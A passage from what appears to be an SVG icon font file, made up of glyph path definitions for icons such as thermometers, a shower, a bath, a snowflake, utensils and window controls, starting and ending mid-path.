c-4.40039 0 -8 -3.59961 -8 -8zM352 184v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8zM352 120v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8v16
c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8zM176 256c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM67.0996 51.7998c-3.19922 -9.7998 5.2002 -19.7998 15.6006 -19.7998h186.6
c10.4004 0 18.7998 9.90039 15.6006 19.7998c-8.40039 25.7002 -32.5 44.2002 -60.9004 44.2002h-8.2002c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-8.2002c-28.4004 0 -52.5 -18.5 -60.9004 -44.2002z" />
    <glyph glyph-name="thermometer-full" unicode="&#xf2c7;" horiz-adv-x="256" 
d="M224 352v-203.347c19.9121 -22.5635 32 -52.1943 32 -84.6533c0 -70.6963 -57.3018 -128 -128 -128c-0.298828 0 -0.610352 0.000976562 -0.90918 0.00292969c-70.3018 0.488281 -127.448 58.3613 -127.089 128.664c0.164062 32.1973 12.2227 61.5771 31.998 83.9863
v203.347c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96zM128 -16c44.1123 0 80 35.8877 80 80c0 34.3379 -19.3701 52.1904 -32 66.502v221.498c0 26.4668 -21.5332 48 -48 48s-48 -21.5332 -48 -48v-221.498c-12.7334 -14.4277 -31.8262 -32.0996 -31.999 -66.0801
c-0.223633 -43.876 35.5635 -80.1162 79.4229 -80.4199zM192 64c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64c0 23.6846 12.876 44.3486 32 55.417v232.583c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-232.583c19.124 -11.0684 32 -31.7324 32 -55.417z" />
    <glyph glyph-name="thermometer-three-quarters" unicode="&#xf2c8;" horiz-adv-x="256" 
d="M192 64c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64c0 23.6846 12.876 44.3486 32 55.417v168.583c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-168.583c19.124 -11.0684 32 -31.7324 32 -55.417zM224 148.653c19.9121 -22.5635 32 -52.1943 32 -84.6533
c0 -70.6963 -57.3027 -128 -128 -128c-0.298828 0 -0.609375 0.000976562 -0.90918 0.00292969c-70.3018 0.488281 -127.448 58.3613 -127.089 128.664c0.164062 32.1982 12.2227 61.5781 31.998 83.9863v203.347c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96v-203.347z
M208 64c0 34.3389 -19.3701 52.1904 -32 66.502v221.498c0 26.4668 -21.5332 48 -48 48s-48 -21.5332 -48 -48v-221.498c-12.7324 -14.4277 -31.8252 -32.0996 -31.999 -66.0801c-0.223633 -43.876 35.5635 -80.1162 79.4229 -80.4199l0.576172 -0.00195312
c44.1123 0 80 35.8877 80 80z" />
    <glyph glyph-name="thermometer-half" unicode="&#xf2c9;" horiz-adv-x="256" 
d="M192 64c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64c0 23.6846 12.876 44.3486 32 55.417v104.583c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-104.583c19.124 -11.0684 32 -31.7324 32 -55.417zM224 148.653c19.9121 -22.5635 32 -52.1943 32 -84.6533
c0 -70.6963 -57.3027 -128 -128 -128c-0.298828 0 -0.609375 0.000976562 -0.90918 0.00292969c-70.3018 0.488281 -127.448 58.3613 -127.089 128.664c0.164062 32.1982 12.2227 61.5781 31.998 83.9863v203.347c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96v-203.347z
M208 64c0 34.3389 -19.3701 52.1904 -32 66.502v221.498c0 26.4668 -21.5332 48 -48 48s-48 -21.5332 -48 -48v-221.498c-12.7324 -14.4277 -31.8252 -32.0996 -31.999 -66.0801c-0.223633 -43.876 35.5635 -80.1162 79.4229 -80.4199l0.576172 -0.00195312
c44.1123 0 80 35.8877 80 80z" />
    <glyph glyph-name="thermometer-quarter" unicode="&#xf2ca;" horiz-adv-x="256" 
d="M192 64c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64c0 23.6846 12.876 44.3486 32 55.417v40.583c0 17.6729 14.3271 32 32 32s32 -14.3271 32 -32v-40.583c19.124 -11.0684 32 -31.7324 32 -55.417zM224 148.653c19.9121 -22.5635 32 -52.1943 32 -84.6533
c0 -70.6963 -57.3027 -128 -128 -128c-0.298828 0 -0.609375 0.000976562 -0.90918 0.00292969c-70.3018 0.488281 -127.448 58.3613 -127.089 128.664c0.164062 32.1982 12.2227 61.5781 31.998 83.9863v203.347c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96v-203.347z
M208 64c0 34.3389 -19.3701 52.1904 -32 66.502v221.498c0 26.4668 -21.5332 48 -48 48s-48 -21.5332 -48 -48v-221.498c-12.7324 -14.4277 -31.8252 -32.0996 -31.999 -66.0801c-0.223633 -43.876 35.5635 -80.1162 79.4229 -80.4199l0.576172 -0.00195312
c44.1123 0 80 35.8877 80 80z" />
    <glyph glyph-name="thermometer-empty" unicode="&#xf2cb;" horiz-adv-x="256" 
d="M192 64c0 -35.3457 -28.6543 -64 -64 -64s-64 28.6543 -64 64s28.6543 64 64 64s64 -28.6543 64 -64zM224 148.653c19.9121 -22.5635 32 -52.1943 32 -84.6533c0 -70.6963 -57.3027 -128 -128 -128c-0.298828 0 -0.609375 0.000976562 -0.90918 0.00292969
c-70.3018 0.488281 -127.448 58.3613 -127.089 128.664c0.164062 32.1982 12.2227 61.5781 31.998 83.9863v203.347c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96v-203.347zM208 64c0 34.3389 -19.3701 52.1904 -32 66.502v221.498c0 26.4668 -21.5332 48 -48 48
s-48 -21.5332 -48 -48v-221.498c-12.7324 -14.4277 -31.8252 -32.0996 -31.999 -66.0801c-0.223633 -43.876 35.5635 -80.1162 79.4229 -80.4199l0.576172 -0.00195312c44.1123 0 80 35.8877 80 80z" />
    <glyph glyph-name="shower" unicode="&#xf2cc;" 
d="M389.66 312.4l-158.061 -158.061c-9.36914 -9.37012 -24.5693 -9.37012 -33.9395 0l-11.3203 11.3203c-9.37012 9.37012 -9.37012 24.5703 0 33.9395l0.110352 0.110352c-34.0303 40.21 -35.1602 98.9404 -3.39062 140.38
c-11.9697 7.5498 -26.1396 11.9102 -41.2998 11.9102c-42.8799 0 -77.7598 -34.8799 -77.7598 -77.7598v-306.24h-64v306.24c0 78.1699 63.5898 141.76 141.76 141.76c36.9307 0 70.6104 -14.2002 95.8604 -37.4199c35.8994 11.5098 76.5 4.5 106.67 -21.0303
l0.110352 0.110352c9.36914 9.37012 24.5693 9.37012 33.9395 0l11.3203 -11.3203c9.37012 -9.37012 9.37012 -24.5703 0 -33.9395zM384 240c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM416 240c0 8.83691 7.16309 16 16 16
s16 -7.16309 16 -16s-7.16309 -16 -16 -16s-16 7.16309 -16 16zM512 240c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM352 208c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16z
M400 224c8.83691 0 16 -7.16309 16 -16s-7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16zM480 208c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM320 176c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16
s7.16309 16 16 16s16 -7.16309 16 -16zM352 176c0 8.83691 7.16309 16 16 16s16 -7.16309 16 -16s-7.16309 -16 -16 -16s-16 7.16309 -16 16zM448 176c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM320 144
c0 8.83691 7.16309 16 16 16s16 -7.16309 16 -16s-7.16309 -16 -16 -16s-16 7.16309 -16 16zM416 144c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM320 112c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16
s7.16309 16 16 16s16 -7.16309 16 -16zM384 112c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM352 80c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16zM320 48
c0 -8.83691 -7.16309 -16 -16 -16s-16 7.16309 -16 16s7.16309 16 16 16s16 -7.16309 16 -16z" />
    <glyph glyph-name="bath" unicode="&#xf2cd;" 
d="M488 192c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-8v-32c0 -28.4297 -12.3623 -53.9688 -32 -71.5469v-32.4531c0 -13.2549 -10.7451 -24 -24 -24h-16c-13.2549 0 -24 10.7451 -24 24v8h-256v-8c0 -13.2549 -10.7451 -24 -24 -24h-16
c-13.2549 0 -24 10.7451 -24 24v32.4531c-19.6377 17.5781 -32 43.1172 -32 71.5469v32h-8c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h8v144c0 44.1123 35.8877 80 80 80c27.2119 0 51.2812 -13.667 65.7393 -34.4873
c21.8838 6.06445 46.2285 1.10449 64.1777 -15.3643c4.71289 4.1748 11.916 4.02051 16.4277 -0.491211l11.3145 -11.3145c4.68555 -4.68652 4.68555 -12.2852 0 -16.9707l-95.0303 -95.0293c-4.68652 -4.68555 -12.2852 -4.68555 -16.9707 0l-11.3145 11.3145
c-4.51172 4.51172 -4.66699 11.7148 -0.491211 16.4277c-21.5244 23.459 -23.3291 57.8281 -6.83789 83.0352c-5.68262 8.93457 -15.6641 14.8799 -27.0146 14.8799c-17.6445 0 -32 -14.3555 -32 -32v-144h408z" />
    <glyph glyph-name="podcast" unicode="&#xf2ce;" horiz-adv-x="448" 
d="M267.429 -40.5635c-5.14258 -19.0098 -24.5703 -23.4365 -43.4287 -23.4365c-18.8574 0 -38.2861 4.42676 -43.4277 23.4365c-7.64551 28.4297 -20.5723 99.665 -20.5723 132.813c0 35.1562 31.1416 43.75 64 43.75s64 -8.59375 64 -43.75
c0 -32.9492 -12.8711 -104.179 -20.5713 -132.813zM156.867 159.446c2.6748 -2.61914 2.39941 -6.98535 -0.628906 -9.18555c-9.3125 -6.76465 -16.4609 -15.3418 -21.2354 -25.3623c-1.74219 -3.65723 -6.5 -4.6582 -9.45312 -1.8877
c-28.0176 26.2891 -45.5498 63.6279 -45.5498 104.989c0 80.7852 66.8691 146.247 148.163 143.941c76.1982 -2.16113 137.938 -64.1631 139.793 -140.369c1.04199 -42.7822 -16.6846 -81.5225 -45.5107 -108.565c-2.95215 -2.76855 -7.70801 -1.7627 -9.44922 1.8916
c-4.77441 10.0195 -11.9219 18.5977 -21.2344 25.3623c-3.02832 2.20117 -3.30273 6.56738 -0.62793 9.1875c17.8018 17.4355 28.8662 41.7246 28.8662 68.5518c0 54.1934 -45.1377 98.042 -99.793 95.9258c-49.7295 -1.9248 -90.0703 -42.1572 -92.124 -91.8809
c-1.17383 -28.4258 10.0908 -54.291 28.7842 -72.5986zM224 448c123.815 0 224 -100.205 224 -224c0 -90.1865 -52.7734 -165.727 -125.739 -201.407c-4.33203 -2.11914 -9.2666 1.54297 -8.53516 6.31055c2.55566 16.6416 4.625 33.1924 5.62402 47.2295
c48.4922 31.377 80.6504 85.9355 80.6504 147.867c0 97.2031 -79.207 176.253 -176.468 175.999c-96.2393 -0.250977 -174.938 -78.6621 -175.529 -174.899c-0.376953 -61.3311 30.7871 -115.541 78.1875 -147.347c1.52832 -1.02637 2.53125 -2.67578 2.67773 -4.51172
c1.06348 -13.3936 3.02344 -28.8271 5.40625 -44.3389c0.731445 -4.7666 -4.20215 -8.42871 -8.53516 -6.31055c-73.1377 35.7607 -125.739 111.416 -125.739 201.408c0 123.815 100.204 224 224 224zM224 288c35.3457 0 64 -28.6543 64 -64s-28.6543 -64 -64 -64
s-64 28.6543 -64 64s28.6543 64 64 64z" />
    <glyph glyph-name="window-maximize" unicode="&#xf2d0;" 
d="M464 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h416zM448 256v84c0 6.59961 -5.40039 12 -12 12h-360c-6.59961 0 -12 -5.40039 -12 -12v-84h384z" />
    <glyph glyph-name="window-minimize" unicode="&#xf2d1;" 
d="M464 96c26.5 0 48 -21.5 48 -48v-32c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v32c0 26.5 21.5 48 48 48h416z" />
    <glyph glyph-name="window-restore" unicode="&#xf2d2;" 
d="M512 400v-288c0 -26.5 -21.5 -48 -48 -48h-48v208c0 44.0996 -35.9004 80 -80 80h-208v48c0 26.5 21.5 48 48 48h288c26.5 0 48 -21.5 48 -48zM384 272v-288c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h288
c26.5 0 48 -21.5 48 -48zM316 244c0 6.59961 -5.40039 12 -12 12h-228c-6.59961 0 -12 -5.40039 -12 -12v-52h252v52z" />
    <glyph glyph-name="microchip" unicode="&#xf2db;" 
d="M416 400v-416c0 -26.5098 -21.4902 -48 -48 -48h-224c-26.5098 0 -48 21.4902 -48 48v416c0 26.5098 21.4902 48 48 48h224c26.5098 0 48 -21.4902 48 -48zM512 342v-12c0 -3.31152 -2.68848 -6 -6 -6h-18v-6c0 -3.31152 -2.68848 -6 -6 -6h-42v48h42
c3.31152 0 6 -2.68848 6 -6v-6h18c3.31152 0 6 -2.68848 6 -6zM512 246v-12c0 -3.31152 -2.68848 -6 -6 -6h-18v-6c0 -3.31152 -2.68848 -6 -6 -6h-42v48h42c3.31152 0 6 -2.68848 6 -6v-6h18c3.31152 0 6 -2.68848 6 -6zM512 150v-12c0 -3.31152 -2.68848 -6 -6 -6h-18v-6
c0 -3.31152 -2.68848 -6 -6 -6h-42v48h42c3.31152 0 6 -2.68848 6 -6v-6h18c3.31152 0 6 -2.68848 6 -6zM512 54v-12c0 -3.31152 -2.68848 -6 -6 -6h-18v-6c0 -3.31152 -2.68848 -6 -6 -6h-42v48h42c3.31152 0 6 -2.68848 6 -6v-6h18c3.31152 0 6 -2.68848 6 -6zM30 72h42
v-48h-42c-3.31152 0 -6 2.68848 -6 6v6h-18c-3.31152 0 -6 2.68848 -6 6v12c0 3.31152 2.68848 6 6 6h18v6c0 3.31152 2.68848 6 6 6zM30 168h42v-48h-42c-3.31152 0 -6 2.68848 -6 6v6h-18c-3.31152 0 -6 2.68848 -6 6v12c0 3.31152 2.68848 6 6 6h18v6
c0 3.31152 2.68848 6 6 6zM30 264h42v-48h-42c-3.31152 0 -6 2.68848 -6 6v6h-18c-3.31152 0 -6 2.68848 -6 6v12c0 3.31152 2.68848 6 6 6h18v6c0 3.31152 2.68848 6 6 6zM30 360h42v-48h-42c-3.31152 0 -6 2.68848 -6 6v6h-18c-3.31152 0 -6 2.68848 -6 6v12
c0 3.31152 2.68848 6 6 6h18v6c0 3.31152 2.68848 6 6 6z" />
    <glyph glyph-name="snowflake" unicode="&#xf2dc;" horiz-adv-x="448" 
d="M440.3 102.8c7.40039 -4.2002 9.90039 -13.7002 5.60059 -21l-15.5 -26.7998c-4.30078 -7.40039 -13.7002 -10 -21.1006 -5.7002l-33.7998 19.5l7 -26c2.2002 -8.2002 -2.7002 -16.7002 -10.9004 -18.8994l-14.8994 -4
c-8.2002 -2.2002 -16.7002 2.69922 -18.9004 10.8994l-19 70.7998l-62.7998 36.2002v-77.5l53.4004 -53.7002c6.19922 -6.19922 6.19922 -16.3994 0 -22.5996l-11.3008 -11.2998c-6.19922 -6.2002 -16.3994 -6.2002 -22.5996 0l-19.7002 19.7002v-40.4004
c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v40.2998l-19.7002 -19.7002c-6.19922 -6.19922 -16.3994 -6.19922 -22.5996 0l-11.2998 11.3008c-6.2998 6.19922 -6.2998 16.3994 0 22.5996l53.7002 53.7002v77.5l-62.8008 -36.2002l-19 -70.7998
c-2.19922 -8.2002 -10.6992 -13.1006 -18.8994 -10.9004l-14.9004 4c-8.2002 2.2002 -13.0996 10.7002 -10.8994 18.9004l7 26l-33.8008 -19.5c-7.39941 -4.2002 -16.7998 -1.7002 -21.0996 5.7002l-15.5 26.7998c-4.2002 7.39941 -1.7002 16.7998 5.7002 21.0996
l33.7998 19.6006l-26 7c-8.2002 2.19922 -13.0996 10.6992 -10.9004 18.8994l4 14.9004c2.2002 8.2002 10.7002 13.0996 18.9004 10.8994l70.7998 -19l63.7998 36.9004l-63.7998 36.9004l-70.7998 -19c-8.2002 -2.2002 -16.7002 2.69922 -18.9004 10.8994l-4 14.9004
c-2.19922 8.2998 2.7002 16.7998 11 19l26 7l-33.7998 19.5c-7.39941 4.2998 -10 13.7002 -5.7002 21.0996l15.5 26.7002c4.30078 7.40039 13.7002 10 21.1006 5.7002l33.7998 -19.5l-7 26c-2.2002 8.2002 2.7002 16.7002 10.9004 18.8994l14.8994 4
c8.2002 2.2002 16.7002 -2.69922 18.9004 -10.8994l19 -70.7998l62.7998 -36.2002v77.5l-53.7002 53.7002c-6.2998 6.19922 -6.2998 16.3994 0 22.5996l11.4004 11.2998c6.2002 6.2002 16.3994 6.2002 22.5996 0l19.7002 -19.7002v40.4004c0 8.7998 7.2002 16 16 16h32
c8.7998 0 16 -7.2002 16 -16v-40.4004l19.7998 19.7002c6.2002 6.2002 16.4004 6.2002 22.6006 0l11.2998 -11.2998c6.2002 -6.2002 6.2002 -16.4004 0 -22.5996l-53.7002 -53.7002v-77.5l62.7998 36.2002l19 70.7998c2.2002 8.2002 10.7002 13.0996 18.9004 10.8994
l14.8994 -4c8.2002 -2.19922 13.1006 -10.6992 10.9004 -18.8994l-7 -26l33.7998 19.5c7.40039 4.2002 16.7998 1.7002 21.1006 -5.7002l15.5 -26.7998c4.19922 -7.40039 1.69922 -16.7998 -5.7002 -21.1006l-33.7998 -19.5l26 -7
c8.19922 -2.19922 13.0996 -10.6992 10.8994 -18.8994l-4 -14.9004c-2.2002 -8.2002 -10.7002 -13.0996 -18.8994 -10.8994l-70.8008 19l-63.7998 -36.9004l63.9004 -37l70.7998 19c8.2002 2.2002 16.7002 -2.7002 18.9004 -10.9004l4 -14.8994
c2.19922 -8.2002 -2.7002 -16.7002 -10.9004 -18.9004l-26 -7z" />
    <glyph glyph-name="utensil-spoon" unicode="&#xf2e5;" 
d="M480.1 416.1c55.1006 -55 34.5 -164.899 -28.5 -227.8c-49.2998 -49.2998 -110 -55.0996 -160.399 -28.7998l-192.4 -214.4c-10.3994 -11.5996 -28.5 -12.0996 -39.5 -1.09961l-51.2998 51.2998c-11.0996 11 -10.5996 29 1 39.5l214.5 192.4
c-26.2998 50.3994 -20.5 111.1 28.7998 160.399c62.9004 63 172.8 83.6006 227.8 28.5z" />
    <glyph glyph-name="utensils" unicode="&#xf2e7;" horiz-adv-x="416" 
d="M207.9 432.8c0.799805 -4.7002 16.0996 -94.5 16.0996 -128.8c0 -52.2998 -27.7998 -89.5996 -68.9004 -104.6l12.9004 -238.101c0.700195 -13.7002 -10.2002 -25.2998 -24 -25.2998h-64c-13.7002 0 -24.7002 11.5 -24 25.2998l12.9004 238.101
c-41.2002 15 -68.9004 52.3994 -68.9004 104.6c0 34.4004 15.2998 124.1 16.0996 128.8c3.2002 20.2998 45.3008 20.6006 47.9004 -1.09961v-141.2c1.2998 -3.40039 15.0996 -3.2002 16 0c1.40039 25.2998 7.90039 139.2 8 141.8c3.2998 20.7998 44.7002 20.7998 47.9004 0
c0.199219 -2.7002 6.59961 -116.5 8 -141.8c0.899414 -3.2002 14.7998 -3.40039 16 0v141.2c2.59961 21.5996 44.7998 21.3994 48 1.09961zM327.1 147.1c-156.5 122.4 -17.5996 300.9 64.9004 300.9c13.2998 0 24 -10.7998 24 -24v-464c0 -13.2998 -10.7002 -24 -24 -24h-56
c-14 0 -25.0996 12 -23.9004 26z" />
    <glyph glyph-name="undo-alt" unicode="&#xf2ea;" 
d="M255.545 440c136.809 0.245117 248.456 -111.193 248.455 -248.002c-0.000976562 -136.965 -111.034 -247.998 -248 -247.998c-63.9258 0 -122.202 24.1865 -166.178 63.9082c-5.11328 4.61816 -5.35449 12.5605 -0.482422 17.4326l39.6621 39.6621
c4.46191 4.46094 11.625 4.71387 16.3682 0.552734c30.6328 -26.8779 69.5029 -41.5557 110.63 -41.5557c93.8164 0 167.236 75.9912 167.994 166.552c0.798828 95.4648 -77.0859 170.24 -169.484 169.442c-42.4287 -0.366211 -82.3662 -16.374 -113.229 -45.2734
l41.75 -41.75c15.1191 -15.1201 4.41113 -40.9707 -16.9717 -40.9707h-134.059c-13.2549 0 -24 10.7451 -24 24v134.059c0 21.3828 25.8506 32.0908 40.9707 16.9707l35.7139 -35.7139c44.4229 42.4512 104.592 68.5654 170.86 68.6846z" />
    <glyph glyph-name="trash-alt" unicode="&#xf2ed;" horiz-adv-x="448" 
d="M32 -16v336h384v-336c0 -26.4961 -21.5039 -48 -48 -48h-288c-26.4961 0 -48 21.5039 -48 48zM304 240v-224c0 -8.83203 7.16797 -16 16 -16s16 7.16797 16 16v224c0 8.83203 -7.16797 16 -16 16s-16 -7.16797 -16 -16zM208 240v-224c0 -8.83203 7.16797 -16 16 -16
s16 7.16797 16 16v224c0 8.83203 -7.16797 16 -16 16s-16 -7.16797 -16 -16zM112 240v-224c0 -8.83203 7.16797 -16 16 -16s16 7.16797 16 16v224c0 8.83203 -7.16797 16 -16 16s-16 -7.16797 -16 -16zM432 416c8.83203 0 16 -7.16797 16 -16v-32
c0 -8.83203 -7.16797 -16 -16 -16h-416c-8.83203 0 -16 7.16797 -16 16v32c0 8.83203 7.16797 16 16 16h120l9.40039 18.7002c3.58984 7.3418 13.1357 13.2998 21.3086 13.2998h0.0908203h114.3h0.0175781c8.20215 0 17.8262 -5.95801 21.4824 -13.2998l9.40039 -18.7002
h120z" />
    <glyph glyph-name="sync-alt" unicode="&#xf2f1;" 
d="M370.72 314.72c-31.2617 29.2725 -71.832 45.3184 -114.872 45.2803c-77.458 -0.0683594 -144.328 -53.1777 -162.791 -126.85c-1.34375 -5.36328 -6.12207 -9.15039 -11.6504 -9.15039h-57.3037c-7.49707 0 -13.1934 6.80664 -11.8066 14.1758
c21.6367 114.9 122.518 201.824 243.704 201.824c66.4482 0 126.791 -26.1357 171.315 -68.6846l35.7148 35.7148c15.1191 15.1191 40.9697 4.41113 40.9697 -16.9717v-134.059c0 -13.2549 -10.7451 -24 -24 -24h-134.059c-21.3828 0 -32.0908 25.8506 -16.9717 40.9707z
M32 152h134.059c21.3828 0 32.0908 -25.8506 16.9717 -40.9707l-41.75 -41.75c31.2617 -29.2734 71.835 -45.3193 114.876 -45.2803c77.418 0.0703125 144.314 53.1436 162.787 126.849c1.34375 5.36328 6.12207 9.15039 11.6504 9.15039h57.3047
c7.49805 0 13.1934 -6.80664 11.8066 -14.1758c-21.6377 -114.898 -122.519 -201.822 -243.705 -201.822c-66.4482 0 -126.791 26.1357 -171.315 68.6846l-35.7148 -35.7148c-15.1191 -15.1191 -40.9697 -4.41113 -40.9697 16.9717v134.059c0 13.2549 10.7451 24 24 24z" />
    <glyph glyph-name="stopwatch" unicode="&#xf2f2;" horiz-adv-x="448" 
d="M432 144c0 -114.9 -93.0996 -208 -208 -208s-208 93.0996 -208 208c0 104 76.2998 190.2 176 205.5v34.5h-28c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h120c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-28v-34.5
c37.5 -5.7998 71.7002 -21.5996 99.7002 -44.5996l27.5 27.5c4.7002 4.69922 12.2998 4.69922 17 0l28.2998 -28.3008c4.7002 -4.69922 4.7002 -12.2998 0 -17l-29.4004 -29.3994l-0.599609 -0.600586c21.2002 -32.3994 33.5 -71.2998 33.5 -113.1zM256 108v151.5
c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-151.5c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="sign-out-alt" unicode="&#xf2f5;" horiz-adv-x="503" 
d="M497 175l-168 -168c-15 -15 -41 -4.5 -41 17v96h-136c-13.2998 0 -24 10.7002 -24 24v96c0 13.2998 10.7002 24 24 24h136v96c0 21.4004 25.9004 32 41 17l168 -168c9.2998 -9.40039 9.2998 -24.5996 0 -34zM192 12c0 -6.59961 -5.40039 -12 -12 -12h-84
c-53 0 -96 43 -96 96v192c0 53 43 96 96 96h84c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-84c-17.7002 0 -32 -14.2998 -32 -32v-192c0 -17.7002 14.2998 -32 32 -32h84c6.59961 0 12 -5.40039 12 -12v-40z" />
    <glyph glyph-name="sign-in-alt" unicode="&#xf2f6;" 
d="M416 0h-84c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h84c17.7002 0 32 14.2998 32 32v192c0 17.7002 -14.2998 32 -32 32h-84c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h84c53 0 96 -43 96 -96v-192c0 -53 -43 -96 -96 -96z
M369 201c9.2998 -9.40039 9.2998 -24.5996 0 -34l-168 -168c-15 -15 -41 -4.5 -41 17v96h-136c-13.2998 0 -24 10.7002 -24 24v96c0 13.2998 10.7002 24 24 24h136v96c0 21.5 26 32 41 17z" />
    <glyph glyph-name="redo-alt" unicode="&#xf2f9;" horiz-adv-x="511" 
d="M256.455 440c66.2686 -0.119141 126.437 -26.2334 170.859 -68.6846l35.7148 35.7148c15.1201 15.1191 40.9707 4.41113 40.9707 -16.9717v-134.059c0 -13.2549 -10.7451 -24 -24 -24h-134.059c-21.3828 0 -32.0908 25.8506 -16.9717 40.9707l41.75 41.75
c-30.8633 28.8994 -70.8008 44.9072 -113.229 45.2734c-92.3984 0.797852 -170.283 -73.9775 -169.484 -169.442c0.757812 -90.5605 74.1777 -166.552 167.994 -166.552c41.127 0 79.9971 14.6777 110.629 41.5557c4.74316 4.16113 11.9062 3.9082 16.3682 -0.552734
l39.6621 -39.6621c4.87207 -4.87207 4.63086 -12.8145 -0.482422 -17.4326c-43.9746 -39.7217 -102.251 -63.9082 -166.177 -63.9082c-136.966 0 -247.999 111.033 -248 247.998c-0.000976562 136.809 111.646 248.247 248.455 248.002z" />
    <glyph glyph-name="poo" unicode="&#xf2fe;" 
d="M451.4 78.9004c34.2998 -5.5 60.5996 -35 60.5996 -70.9004c0 -39.7998 -32.2002 -72 -72 -72h-368c-39.7998 0 -72 32.2002 -72 72c0 35.9004 26.2998 65.4004 60.5996 70.9004c-17.2998 13.0996 -28.5996 33.6992 -28.5996 57.0996c0 39.7998 32.2002 72 72 72h14.0996
c-13.3994 11.7002 -22.0996 28.7998 -22.0996 48c0 35.2998 28.7002 64 64 64h16c44.2002 0 80 35.7998 80 80c0 17.4004 -5.7002 33.4004 -15.0996 46.5c4.89941 0.799805 9.89941 1.5 15.0996 1.5c53 0 96 -43 96 -96c0 -11.2998 -2.2998 -21.9004 -5.90039 -32h5.90039
c35.2998 0 64 -28.7002 64 -64c0 -19.2002 -8.7002 -36.2998 -22.0996 -48h14.0996c39.7998 0 72 -32.2002 72 -72c0 -23.4004 -11.2998 -44 -28.5996 -57.0996zM192 192c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32z
M351.5 53c2 5.2998 -2 11 -7.7998 11h-175.4c-5.7998 0 -9.7998 -5.7002 -7.7998 -11c10.5 -27.9004 58.5 -53 95.5 -53s85 25.0996 95.5 53zM320 128c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="images" unicode="&#xf302;" horiz-adv-x="576" 
d="M480 32v-16c0 -26.5098 -21.4902 -48 -48 -48h-384c-26.5098 0 -48 21.4902 -48 48v256c0 26.5098 21.4902 48 48 48h16v-208c0 -44.1123 35.8877 -80 80 -80h336zM576 112c0 -26.5098 -21.4902 -48 -48 -48h-384c-26.5098 0 -48 21.4902 -48 48v256
c0 26.5098 21.4902 48 48 48h384c26.5098 0 48 -21.4902 48 -48v-256zM256 320c0 26.5098 -21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48s48 21.4902 48 48zM160 176v-48h352v112l-87.5137 87.5146c-4.6875 4.68652 -12.2852 4.68652 -16.9717 0
l-135.515 -135.515l-39.5137 39.5146c-4.6875 4.68652 -12.2852 4.68652 -16.9717 0z" />
    <glyph glyph-name="pencil-alt" unicode="&#xf303;" 
d="M497.9 305.9l-46.1006 -46.1006c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-111 111c-4.7002 4.7002 -4.7002 12.2998 0 17l46.1006 46.1006c18.6992 18.6992 49.0996 18.6992 67.8994 0l60.1006 -60.1006c18.7998 -18.7002 18.7998 -49.0996 0 -67.8994zM284.2 348.2
